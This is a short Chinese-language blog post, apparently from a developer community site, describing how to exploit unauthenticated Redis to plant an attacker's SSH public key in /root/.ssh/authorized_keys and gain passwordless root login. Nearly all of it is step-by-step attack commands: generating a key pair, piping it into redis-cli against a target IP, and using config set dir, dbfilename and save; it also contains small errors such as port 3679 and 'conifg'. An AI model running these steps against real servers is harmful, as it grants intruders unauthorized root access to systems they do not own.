redis未授权写入ssh公钥登录
利用redis的备份功能,写入ssh公钥
·
原理
利用redis的备份功能,写入ssh公钥
利用条件
1.开放3679端口和22端口
2.服务器用root权限启动redis服务(能够切换目录)
影响版本
小于redis-4.0.10
实验步骤
1.在目标机上使用root权限启动redis服务
1.在攻击机上创建ssh密钥对
ssh-keygen
2.创建1.txt,把攻击机的公钥写入1.txt,并传入目标redis服务的缓存
(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > 1.txt cat 1.txt | redis-cli -h 192.168.117.10
3.修改redis的配置
config set dir /root/.ssh conifg set dbfilename authorized_keys save quit
4.ssh免密登录
为开发者提供学习成长、分享交流、生态实践、资源工具等服务,帮助开发者快速成长。
更多推荐
1
0- 0
已为社区贡献1条内容
所有评论(0)